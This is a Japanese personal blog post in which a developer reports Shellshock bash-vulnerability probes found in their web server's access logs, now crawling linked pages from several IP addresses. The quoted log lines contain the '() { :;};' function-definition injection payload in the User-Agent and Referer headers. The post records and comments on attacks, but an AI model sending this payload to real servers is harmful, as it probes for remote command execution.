FC2ブログ

スポンサーサイト

上記の広告は1ヶ月以上更新のないブログに表示されています。
新しい記事を書く事で広告が消せます。

bashの脆弱性(さらに続き)

bashの脆弱性ですが、今まではトップページにだけアクセスしていたのですが、
今回はトップページ以下のリンクしているページを順に検査しているような
アクセスがありました。


8.37.217.199 - - [10/Oct/2014:06:52:07 +0900] "GET /room.php?room=1.1.53 HTTP/1.1" 200 9142 "() { :;};echo content-type:text/plain;echo;echo QwaAqdKyMkdAiaZBos;echo;exit" "() { :;};echo content-type:text/plain;echo;echo QwaAqdKyMkdAiaZBos;echo;exit"
8.37.217.196 - - [10/Oct/2014:06:52:08 +0900] "GET /room.php?room=1.1.52 HTTP/1.1" 200 9142 "() { :;};echo content-type:text/plain;echo;echo QwaAqdKyMkdAiaZBos;echo;exit" "() { :;};echo content-type:text/plain;echo;echo QwaAqdKyMkdAiaZBos;echo;exit"
8.37.217.197 - - [10/Oct/2014:06:52:08 +0900] "GET /room.php?room=1.1.51 HTTP/1.1" 200 9142 "() { :;};echo content-type:text/plain;echo;echo QwaAqdKyMkdAiaZBos;echo;exit" "() { :;};echo content-type:text/plain;echo;echo QwaAqdKyMkdAiaZBos;echo;exit"
8.37.217.198 - - [10/Oct/2014:06:52:09 +0900] "GET /room.php?room=1.1.50 HTTP/1.1" 200 9139 "() { :;};echo content-type:text/plain;echo;echo QwaAqdKyMkdAiaZBos;echo;exit" "() { :;};echo content-type:text/plain;echo;echo QwaAqdKyMkdAiaZBos;echo;exit"
・・・・


しかもアクセス元が、8.37.217.196から8.37.217.199と複数のアドレスからになっています。
何台も用意して攻撃をしかけようとしてるんでしょうかね。

スポンサーサイト
プロフィール

chattera.net

Author:chattera.net
フリーでソフト開発の仕事をしています。
自作したこのチャットシステムは、何か世の中に役に立つこともあるかと思いますので、お呼びがかかるとうれしいですね。

連絡先は chatteranet@gmail.com です。

また、ソフト開発関連のお誘いもうけたまわっております。

最新記事
最新コメント
最新トラックバック
月別アーカイブ
カテゴリ
検索フォーム
RSSリンクの表示
リンク
ブロとも申請フォーム

この人とブロともになる

QRコード
QR
上記広告は1ヶ月以上更新のないブログに表示されています。新しい記事を書くことで広告を消せます。